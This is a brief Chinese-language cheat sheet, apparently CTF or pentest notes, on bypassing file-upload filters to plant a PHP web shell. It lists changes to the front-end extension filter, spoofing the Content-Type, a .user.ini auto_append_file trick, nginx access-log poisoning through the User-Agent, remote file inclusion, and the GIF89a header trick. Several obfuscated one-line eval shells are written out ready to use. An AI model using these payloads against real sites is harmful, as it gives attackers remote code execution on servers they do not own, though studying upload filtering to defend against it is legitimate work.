|
一、修改前端代码
<button type="button" class="layui-btn" id="upload" lay-data="{url: 'upload.php', accept: 'images',exts:'png'}">
改为
<button type="button" class="layui-btn" id="upload" lay-data="{url: 'upload.php', accept: 'images',exts:'php'}">
<button type="button" class="layui-btn" id="upload" lay-data="{url: 'upload.php', accept: 'file'}">
二、抓包改类型
Content-Disposition: form-data; name="file"; filename="22.php"
Content-Type: application/octet-stream
改为
Content-Disposition: form-data; name="file"; filename="22.php"
Content-Type: image/png
改一下文件头
三、上传.user.ini
其内容为auto_append_file=1.txt
与其同目录的index.php内容会有1.txt的内容
然后上传1.txt
<?= eval($_POST[0]);?>
<?=include '/var/l'.'og/nginx/access/l'.'og'?>
user-agent里面写一句话木马
<?=include'长地址'?>
远程文件包含
四、文件头
图片
GIF89a
五、短标签
<?= eval($_POST[0]);?>
[ ]可由{ }代替
<?= eval($_POST{0});?>
六、分号可能也会被过滤
<?= eval($_POST{0})?>
七、其他
<?=eval(array_pop($_POST))?>
|